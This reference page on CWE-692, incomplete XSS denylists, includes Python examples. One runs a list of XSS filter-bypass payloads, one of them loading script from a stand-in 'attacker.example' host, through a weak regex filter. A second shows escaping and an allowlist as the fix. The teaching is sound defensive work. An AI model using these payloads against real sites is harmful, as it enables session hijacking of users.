Description
The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.
While XSS might seem simple to prevent, web browsers vary so widely in how they parse web pages that a denylist cannot keep track of all the variations. The "XSS Cheat Sheet" [REF-714] contains a large number of attacks intended to bypass incomplete denylists.
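The following is an added example, not code from the CWE entry or from any of the products in the CVEs below. It builds a denylist of the shape those CVEs describe (it knows the literal `<script>` tag and the literal `javascript:` scheme and nothing else) and runs a handful of constructed payloads through it. The function and constant names are the example's own.

```python
import re

# Incomplete denylist of the kind behind the CVEs on this page (constructed for illustration):
# it knows two literal patterns and nothing else.
_SCRIPT_TAG = re.compile(r"</?script>")   # exact case, no attributes allowed between "script" and ">"
_JS_SCHEME = re.compile(r"javascript:")   # exact case, no whitespace inside the scheme

def denylist_filter(untrusted: str) -> str:
    """Strip the two patterns the denylist knows about; everything else passes through."""
    return _JS_SCHEME.sub("", _SCRIPT_TAG.sub("", untrusted))

# Constructed payloads, each a variant the denylist does not recognise.
BYPASSES = [
    "<ScRiPt>alert(1)</ScRiPt>",          # tag-name case variation (HTML tag names are case-insensitive)
    "<script src=//attacker.example>",    # attributes between the tag name and ">"
    '<img src=x onerror="alert(1)">',     # no <script> at all: an event-handler attribute
    "<svg onload=alert(1)>",              # another event handler, on an SVG element
    "JaVaScRiPt:alert(1)",                # scheme case variation (URL schemes are case-insensitive)
    "java\tscript:alert(1)",              # tab inside the scheme; the browser's URL parser removes it
    "jav&#x09;ascript:alert(1)",          # same tab, as an HTML entity inside an attribute value
]

def surviving_bypasses() -> list:
    """Payloads the denylist returns unchanged: each reaches the browser exactly as the attacker wrote it."""
    return [p for p in BYPASSES if denylist_filter(p) == p]

def nested_tag_bypass() -> str:
    """A single-pass strip can assemble the very tag it removes: deleting the inner <script>
    from "<scr<script>ipt>" leaves "<script>"."""
    return denylist_filter("<scr<script>ipt>alert(1)</script>")

if __name__ == "__main__":
    for p in surviving_bypasses():
        print("passes denylist unchanged:", p)
    print("nested payload becomes:", nested_tag_bypass())
```

Every entry in BYPASSES comes out of `denylist_filter` byte-for-byte unchanged, and the nested payload comes out as a plain `<script>` tag. Adding each of these to the denylist would only move the problem to the next variant in [REF-714]; the filter is wrong in kind, not merely short of entries.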
Potential Impact
Confidentiality, Integrity, Availability
Execute Unauthorized Code or Commands
Real-World CVE Examples
| CVE ID | Description |
|---|---|
| CVE-2007-5727 | Denylist only removes <SCRIPT> tag. |
| CVE-2006-3617 | Denylist only removes <SCRIPT> tag. |
| CVE-2006-4308 | Denylist only checks for the "javascript:" URI scheme. |
Related Weaknesses
Frequently Asked Questions
What is CWE-692?
CWE-692 (Incomplete Denylist to Cross-Site Scripting) is a software weakness identified by MITRE's Common Weakness Enumeration. It is classified as a Compound-level weakness. The product uses a denylist-based protection mechanism to defend against XSS attacks, but the denylist is incomplete, allowing XSS variants to succeed.
How can CWE-692 be exploited?
An attacker submits an XSS payload in a form the denylist does not recognize: a tag name in a different case, a tag carrying attributes, an event-handler attribute on an ordinary element instead of a <script> tag, or a "javascript:" scheme broken up with whitespace or entity-encoded. The browser still interprets the payload, so the attacker's script executes in the victim's session, with the confidentiality, integrity and availability impact listed above. This weakness is typically introduced during the Implementation phase of software development.
How do I prevent CWE-692?
Do not rely on a denylist. Encode untrusted data for the context it is written into (HTML-escape it for body text and quoted attribute values, for example) so that markup in the input is rendered as literal text rather than searched for. Where some markup or user-supplied URLs must be allowed, use an allowlist (accept known good: a fixed set of tags and attributes, or only http/https link targets) implemented by a well-vetted HTML sanitizer library rather than hand-written regular expressions. The "XSS Cheat Sheet" [REF-714] is a useful regression corpus for any filter you keep. Code reviews and automated security testing (SAST/DAST) help detect the weakness early in the development lifecycle.
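As an added example (not code from the CWE entry or from any product it cites), the two output contexts the CVEs above concern, handled by accepting known good instead of rejecting known bad: HTML text and quoted attribute values get escaped, and link targets are kept only if their scheme is http or https. The function names and the `_SAFE_SCHEMES` set are the example's own choices; relative paths are deliberately rejected here to keep the rule simple.

```python
import html
import re
from urllib.parse import urlsplit

def render_text(untrusted: str) -> str:
    """Untrusted data placed in HTML text or inside a quoted attribute: escape every HTML
    metacharacter, so any tags or event handlers in the input are rendered as literal text."""
    return html.escape(untrusted, quote=True)

_SAFE_SCHEMES = {"http", "https"}   # allowlist: absolute http(s) URLs only

def render_href(untrusted_url: str) -> str:
    """Untrusted data used as a link target: accept only absolute http(s) URLs and substitute
    a harmless "#" for anything else (javascript:, data:, vbscript:, relative paths, ...)."""
    # Browsers drop ASCII tab/newline anywhere in a URL before parsing it, so drop them here too
    # rather than rely on the URL library to do it; otherwise "java\tscript:" might be misclassified.
    cleaned = re.sub(r"[\t\n\r]", "", untrusted_url)
    if urlsplit(cleaned).scheme.lower() not in _SAFE_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)   # still attribute-encode for the quoted href context

if __name__ == "__main__":
    # Constructed sample inputs.
    print(render_text('<img src=x onerror="alert(1)">'))
    for u in ("java\tscript:alert(1)", "JaVaScRiPt:alert(1)", "jav&#x09;ascript:alert(1)",
              "data:text/html,<b>", "https://example.com/?q=<a>"):
        print(repr(u), "->", render_href(u))
```

Note that `render_href` fails closed: the entity-encoded variant `jav&#x09;ascript:` is rejected because it has no recognizable scheme, not because the code knows about that trick, and `render_text` never needs to know which tags are dangerous because it renders none of them. That is the difference between an allowlist and the denylist this weakness describes.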
What is the severity of CWE-692?
CWE does not assign a severity to a weakness type; severity is scored per CVE (with CVSS, for example), and a successful exploit of this weakness means attacker-controlled script running in the victim's browser. CWE-692 is classified as a Compound-level weakness (Complex abstraction). The CWE entry lists the three observed CVE examples shown above.